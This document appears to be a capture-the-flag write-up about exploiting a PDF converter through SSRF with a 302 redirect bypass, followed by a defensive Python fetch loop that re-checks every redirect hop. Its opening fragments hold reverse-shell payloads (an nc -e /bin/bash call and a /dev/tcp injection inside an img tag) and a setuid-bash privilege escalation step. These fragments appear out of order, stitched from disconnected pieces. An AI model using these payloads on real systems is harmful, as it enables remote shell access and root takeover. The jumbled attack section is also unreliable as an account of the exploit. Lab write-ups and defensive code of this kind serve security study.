If you are attempting this box, focus on the URL schemes (file://, gopher://) and the metadata of the files you are asking the server to process. The flag is usually found in /root/root.txt or a similar standard location after escalating privileges via a misconfigured script or binary.
Insecure PDF generation from user-supplied URLs. Attack Vector: SSRF via a 302 Redirect bypass.
    # Establish a reverse shell
    os.system('nc 10.10.14.12 4444 -e /bin/bash')
<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>">
Use SSRF to interact with this internal service:
Upon launching the challenge, you are greeted with a simple web interface that prompts for a URL. The application’s stated purpose is to "turn your favorite web pages into portable PDF documents".
After restarting the pdfy-converter service, we verify that the /bin/bash shell has been modified to have setuid permissions. We then execute the /bin/bash shell to gain root access.
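On the defensive side, the 302 redirect bypass described above works when a converter validates only the URL the user submitted and then lets its HTTP client follow redirects on its own. The following is an added example, not code from the original writeup or from the challenge: a fetch loop that re-validates scheme and resolved address on every hop. The host names, the sample public addresses and the `resolve`/`http_get` callables are constructed assumptions so the block runs offline.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # file://, gopher:// etc. are rejected outright
REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 5

def is_public_target(url, resolve):
    """True only for http(s) URLs whose host maps solely to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    addrs = resolve(parts.hostname)
    return bool(addrs) and all(ipaddress.ip_address(a).is_global for a in addrs)

def fetch_for_pdf(url, resolve, http_get):
    """Follow redirects by hand so every hop is validated, not just the first URL."""
    for _ in range(MAX_REDIRECTS + 1):
        if not is_public_target(url, resolve):
            raise ValueError(f"blocked target: {url}")
        status, location, body = http_get(url)   # client must NOT auto-follow redirects
        if status not in REDIRECT_CODES or not location:
            return body
        url = urljoin(url, location)             # next hop is checked at loop start
    raise ValueError("too many redirects")

# --- Constructed fixtures (hypothetical hosts, no network access) ---
DNS = {"good.example": ["93.184.216.34"], "redirector.example": ["93.184.216.35"],
       "internal.example": ["10.0.0.5"]}
RESPONSES = {
    "http://good.example/": (200, None, "<html>ok</html>"),
    "http://redirector.example/a": (302, "http://127.0.0.1:8080/", ""),
    "http://redirector.example/b": (302, "file:///etc/passwd", ""),
}

def fake_resolve(host):
    try:
        ipaddress.ip_address(host)
        return [host]                 # IP literal: check it directly
    except ValueError:
        return DNS.get(host, [])      # unknown names resolve to nothing

def fake_get(url):
    return RESPONSES[url]

def outcome(url):
    try:
        fetch_for_pdf(url, fake_resolve, fake_get)
        return "fetched"
    except ValueError:
        return "blocked"
```

In a real service the connection should also be pinned to the address that was validated, so that a second DNS lookup at connect time cannot return a different, internal address.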